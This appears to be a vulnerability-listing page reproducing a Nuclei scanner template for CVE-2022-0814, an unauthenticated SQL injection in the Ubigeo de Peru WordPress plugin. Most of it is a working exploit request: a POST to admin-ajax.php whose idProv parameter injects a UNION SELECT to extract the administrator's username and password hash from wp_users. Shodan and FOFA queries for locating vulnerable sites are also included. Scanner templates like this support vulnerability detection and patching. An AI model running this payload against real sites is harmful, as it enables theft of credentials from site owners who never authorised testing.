CVE-2022-0814: Ubigeo de Peru < 3.6.4 - SQL Injection

日期: 2025-08-01 | 影响软件: Ubigeo de Peru | POC: 已公开

漏洞描述

The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.

PoC代码[已公开]

id: CVE-2022-0814

info:
  name: Ubigeo de Peru < 3.6.4 - SQL Injection
  author: r3Y3r53
  severity: critical
  description: |
    The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.
  remediation: Fixed in version 3.6.4
  reference:
    - https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814
    - https://wordpress.org/plugins/ubigeo-peru/
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0814
    cwe-id: CWE-89
    epss-score: 0.55564
    epss-percentile: 0.98006
    cpe: cpe:2.3:a:ubigeo_de_peru_para_woocommerce_project:ubigeo_de_peru_para_woocommerce:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ubigeo_de_peru_para_woocommerce_project
    product: ubigeo_de_peru_para_woocommerce
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/ubigeo-peru/
    fofa-query: body=/wp-content/plugins/ubigeo-peru/
    publicwww-query: "/wp-content/plugins/ubigeo-peru/"
  tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth,ubigeo_de_peru_para_woocommerce_project

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users#

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'idProv'
          - 'idDist'
          - 'distrito'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022027840fec6bc80dec09f122732efc7cd91ae6573b1f63c54795622db9eb9c479a022100e685759332e88a9e5ca920ff9920134a3f9d3c818003158e9ae90709f9376e79:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0814.yaml